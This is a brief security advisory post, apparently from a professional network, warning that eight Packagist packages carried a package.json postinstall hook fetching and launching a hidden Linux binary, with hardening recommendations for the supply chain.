Packagist: malicious Linux binary in 8 packages via package.json

Colleagues, please note: a cybersecurity campaign was found affecting eight packages on Packagist.
Socket reports that a postinstall was added to package.json which downloads a Linux binary from GitHub Releases, saves it to /tmp/.sshd, sets permissions and launches it in the background while disabling TLS verification. Infected versions have been removed.
The attack is cross-ecosystem: the payload appears across many repositories and workflows, enabling evasion of Composer-only scanners.
Why this matters: it can enable remote code execution during install or in CI.
Recommendations: inspect package.json, lifecycle scripts and workflows, pin versions and block postinstall.
How are you hardening your supply chain?
#cybersecurity #supplychain #DevSecOps #OpenSource


Latest comments
No comments yet.